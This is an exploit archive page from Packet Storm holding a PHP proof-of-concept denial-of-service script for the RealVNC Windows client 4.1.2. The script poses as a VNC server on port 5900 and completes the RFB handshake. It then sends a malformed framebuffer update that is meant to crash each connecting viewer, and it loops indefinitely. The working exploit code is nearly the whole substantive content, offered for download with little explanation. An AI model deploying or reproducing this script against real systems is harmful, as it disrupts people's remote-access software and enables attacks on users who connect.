what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

realvnc-dos.txt

realvnc-dos.txt
Posted Aug 1, 2008
Authored by beford

RealVNC Windows Client version 4.1.2 remote denial of service proof of concept exploit.

tags | exploit, remote, denial of service, proof of concept
systems | windows
SHA-256 | 424481d889adb78abd006a4764157410168502b5f6b297e288f61fd6b323442b

realvnc-dos.txt

Change Mirror Download
#!/usr/bin/php

<?php

# RealVNC Windows Client DoS
# AppName: vncviewer.exe
# AppVer: 4.1.2.0
# ModName: vncviewer.exe
# ModVer: 4.1.2.0
# Offset: 000229e0

function vncear() {

$port = "5900";
$ser = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_option($ser,SOL_SOCKET,SO_REUSEADDR,1);
socket_bind($ser,"0.0.0.0", $port);
socket_listen($ser, 5);

print "\n[+] listening on $port ...\n";

$crashvnc = socket_accept($ser);
print "[+] client connected\n";
// ProtocolVersion
socket_write($crashvnc, "RFB 003.008\n");
while($i=socket_read($crashvnc, 1024)) if(substr($i,0,6) == "RFB 00") break;
print "\tprotocol has been negotiated\n";

// Security type none
socket_write($crashvnc, "\x01\x01");
while($i=socket_read($crashvnc, 1024)) if(ord($i[0])==1)break;
//$i=socket_read($crashvnc, 124);
print "\tsecurity type accepted\n";

// SecurityResult ok
socket_write($crashvnc, "\x00\x00\x00\x00");
while($i=socket_read($crashvnc, 1024))
if(ord($i[0])==0 || ord($i[0])==1)break;
//
socket_write($crashvnc, "\x04\x00". //frame buffer width
"\x03\x00". //frame buffer height
/* pixel format */
"\x20". //bits per pixel
"\x18". //depth
"\x00". // big endian flag
"\x01". // true color flag
"\x00\xFF". //red max
"\x00\xFF". //green max
"\x00\xFF". //blue max
"\x10". //red shift
"\x08". //green shift
"\x00". //blue shift
"\x00\x00\x00". //padding
/* pixel format */
"\x00\x00\x00\x08". //name lenght
"\x41\x4E\x59\x55\x4C\x49\x4E\x41" // name ANYULINA
);


socket_write($crashvnc,
"\x00\x00\x00\x03". //frame buffer update
"\x00\x05\xFF\xFF\x00\x11\x00\x14\xFF\xFF\xFF\x11".
"\x3F\x3F\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F".
"\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F".
"\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F".
"\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F".
"\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F".
"\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F".
"\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F\x00\x00\x3F".
"\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F".

"\x00\x00\x00\x3F".
"\x00\x3F\x3F\x00\x00\x3F\x3F".
"\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x00\x3F\x3F\x3F\x00\x3F".
"\x3F\x3F\x3F\x3F\x3F\x3F\x3F".
"\x00\x3F\x3F\x00\x3F\x00\x3F\x3F\x00".
"\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F".
"\x00\x3F\x3F\x00\x3F".
"\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00".
"\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F".
"\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F".
"\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00".
"\x3F\x3F\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00".
"\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F".
"\x00\x3F\x3F\x3F\x3F\x3F\x00\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F".
"\x00\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F".
"\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x06".
"\x00\x00\x0F\x00\x00\x0F\x00\x00\x0F\x00\x00".
"\x0F\x00\x00\x0F\xC0\x00\x0F\xF8\x00\x0F\xFC\x00\x6F\xFF\x00\xFF".
"\xFF\x80\xFF\xFF\x80\x7F\xFF\x80\x3F\xFF\x80\x3F\xFF\x80\x3F\xFF".
"\x80\x1F\xFF\x80\x0F\xFF\x00\x0F\xFF\x00\x07\xFE\x00\x03\xFE\x00".
"\x00\x00\x00\x00\x04\x00\x03\x00\x00\x00\x00\x10\x00\x00\x94\xFA");

print "\tit should be dead already";
while(socket_read($crashvnc, 1024)) print ".";
socket_close($crashvnc);
socket_close($ser);

}

print "RealVNC Windows Client DoS (http://realvnc.com/)\n";

for (;;)
vncear();


?>
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close